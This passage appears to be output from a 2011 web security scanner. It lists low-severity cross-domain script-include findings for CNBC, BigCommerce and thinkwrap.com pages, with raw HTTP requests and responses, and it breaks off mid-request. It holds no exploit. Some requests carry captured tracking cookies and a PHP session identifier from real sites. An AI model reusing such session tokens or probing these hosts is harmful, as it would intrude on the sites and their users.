document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:02:17 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:41:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:41:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=&z=7061078845

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:21:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:21:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=&z=7061078845"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:15:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 559
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=&z=8430606850

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:31:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:31:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=&z=8430606850"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=&z=1475285476

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:57:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:57:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=&z=1475285476"><\/script>
...[SNIP]...

20.51. https://register.cnbc.com/email/EmailSupport.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/email/EmailSupport.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.msn.com/library/dap.js

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.52. https://register.cnbc.com/forgotPassword.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/forgotPassword.do

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.msn.com/library/dap.js

Request

Response

20.53. https://register.cnbc.com/forgotPassword1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/forgotPassword1.do

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.msn.com/library/dap.js

Request

Response

20.54. http://search.cnbc.com/main.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://ads1.msn.com/library/dap.js?rti=200914
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

20.55. http://support.bigcommerce.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.bigcommerce.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render
http://www.google.com/cse/query_renderer.js
https://www.google.com/jsapi
https://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: support.bigcommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413574929:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343374929:41658941.6.10.1315341506; 2__utmc=^first.1378413574929:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.13.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 40722
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</div>
   <script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://www.google.com/cse/query_renderer.js"></script>
   <script src="http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.56. https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.bigcommerce.com
Path:	/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render
http://www.google.com/cse/query_renderer.js
https://static.addtoany.com/menu/page.js
https://www.google.com/jsapi
https://www.googleadservices.com/pagead/conversion.js

Request

GET /questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F HTTP/1.1
Host: support.bigcommerce.com
Connection: keep-alive
Referer: http://support.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=95sh21hkr74gpcp03q1tinf0b1k1muq3; 2__utma=^first.1378413579147:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343379147:41658941.7.10.1315341506; 2__utmc=^first.1378413579147:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.16.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 44195
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</div>
   <script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://www.google.com/cse/query_renderer.js"></script>
   <script src="http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render"></script>
...[SNIP]...
</script>
                       <script type="text/javascript" src="https://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.57. http://thinkwrap.com/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/contact/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2

Request

GET /contact/ HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/location-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=111454529.667789240.1315341151.1315341151.1315341151.1; __utmb=111454529.4.10.1315341151; __utmc=111454529; __utmz=111454529.1315341151.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:36:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 13750
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.58. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/ourfocus/atg-ecommerce-solutions-partner/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2

Request

GET /ourfocus/atg-ecommerce-solutions-partner/ HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 17935
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.59. http://thinkwrap.com/ourfocus/location-services/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/ourfocus/location-services/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2

Request

GET /ourfocus/location-services/ HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=111454529.667789240.1315341151.1315341151.1315341151.1; __utmb=111454529.2.10.1315341151; __utmc=111454529; __utmz=111454529.1315341151.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 18336
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.60. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-nav-men.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/wp-content/uploads/2010/07/bg-header-nav-men.png

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2

Request

GET /wp-content/uploads/2010/07/bg-header-nav-men.png HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:32:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14268
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.61. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-su-menu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/wp-content/uploads/2010/07/bg-header-su-menu.gif

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2

Request

GET /wp-content/uploads/2010/07/bg-header-su-menu.gif HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
